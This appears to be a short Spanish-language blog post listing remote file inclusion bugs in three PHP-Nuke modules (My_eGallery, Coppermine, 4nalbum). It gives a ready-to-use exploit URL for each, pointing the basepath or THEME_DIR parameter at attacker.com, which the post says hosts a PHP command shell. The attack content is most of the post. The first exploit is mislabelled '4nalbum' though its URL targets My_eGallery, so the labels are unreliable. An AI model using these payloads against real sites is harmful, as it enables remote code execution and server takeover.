RFI en módulos Php
Estos son unos bugs también un poco antiguos del conocido portal de noticias php-nuke.
Los errores de remote file inclusion se encuentran en los módulos:
- "My_eGallery"
- "Coppermine"
- "4nalbum"
Y los respectivos exploits son:
*********************
Para el "4nalbum"
http://victimima/modules/My_eGallery/public/displaycategory.php?basepath=http://www.attacker.com
*********************
Para el "coppermine"
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.attacker.com
*********************
Y para el "4nalbum"
http://victimima/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com
*********************
En donde "http://www.attacker.com" corresponde a la url de una shell de comandos cmd en php.
Editado por 3rr0r
Cap comentari:
Publica un comentari a l'entrada